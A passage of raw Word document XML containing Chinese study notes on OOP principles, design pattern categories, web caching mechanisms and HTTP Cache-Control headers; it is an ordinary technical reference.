          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JSON-RPC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Remote Procedure Call Protocol，远程过程调用协议，高性能二进制协议，比RESTful要高效（类似于Web Services的使用风格）</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面向对象OOP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>三大基本特性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>继承，封装，多态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>抽象类abstract和接口interface的各种用法及实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Virtual、abstract、override、New、extern等关键字的含义及用法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>设计模式的应用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>六大基本原则（高内聚，低耦合）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单一职责原则SRP(Single Responsibility Principle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开放封闭原则OCP(Open－Close Principle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>里式替换原则LSP(the Liskov Substitution Principle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>依赖倒置原则DIP(the Dependency Inversion Principle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口分离原则ISP(the Interface Segregation Principle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最少知识原则LKP(Least Knowledge Principle）（也称：迪米特原则）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>设计模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这些设计模式提供了一种在创建对象的同时隐藏创建逻辑的方式，而不是使用 new 运算符直接实例化对象。这使得程序在判断针对某个给定实例需要创建哪些对象时更加灵活。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>结构型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>这些设计模式关注类和对象的组合。继承的概念被用来组合接口和定义组合对象获得新功能的方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>行为型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这些设计模式特别关注对象之间的通信。</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缓存及优化技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>浏览器自身缓存技术(cache control,与服务器约定,js /css等缓存)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Session(SessionId)(会话,为了弥补http协议的无状态特性)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie(浏览器存储,为了弥补http协议的无状态特性)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Localstorage(Html5新特性 浏览器本地存储,为了弥补Cookie存储不足)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Application(服务器全局变量)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Static(依赖于IIS，进程回收会丢失)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cache(服务器缓存)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为了更清楚的了解，我们总结出每一种对象应用的具体环境，如下表所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w: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23" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="2172335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>浏览器缓存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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eb资源（如html页面，图片，js，数据等）拷贝一份副本储存在浏览器中。缓存会根据进来的请求保存输出内容的副本。当下一个请求来到的时候，如果是相同的URL，缓存会根据缓存机制决定是直接使用副本响应访问请求，还是向源服务器再次发送请求。比较常见的就是浏览器会缓存访问过网站的网页，当再次访问这个URL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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>报文头里的一些关键信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Expires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Http1.0 中的标准，表明过期时间，注意此处的时间都是指的是服务器的时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cache-Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Http1.1 中的标准，可以看成是 expires 的补充。使用的是相对时间的概念</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cache-Control的属性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>max-age: 设置缓存的最大的有效时间，单位为秒（s）。max-age会覆盖掉Expires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>s-maxage: 只用于共享缓存，比如CDN缓存（s -&gt; share）。与max-age 的区别是：max-age用于普通缓存，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而s-maxage用于代理缓存。如果存在s-maxage,则会覆盖max-age 和 Expires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>public：响应会被缓存，并且在多用户间共享。默认是public。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>private: 响应只作为私有的缓存，不能在用户间共享。如果要求HTTP认证，响应会自动设置为private。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>no-cache: 指定不缓存响应，表明资源不进行缓存。但是设置了no-cache之后并不代表浏览器不缓存，而是在缓存前要向服务器确认资源是否被更改。因此有的时候只设置no-cache防止缓存还是不够保险，还可以加上private指令，将过期时间设为过去的时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>no-store: 绝对禁止缓存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
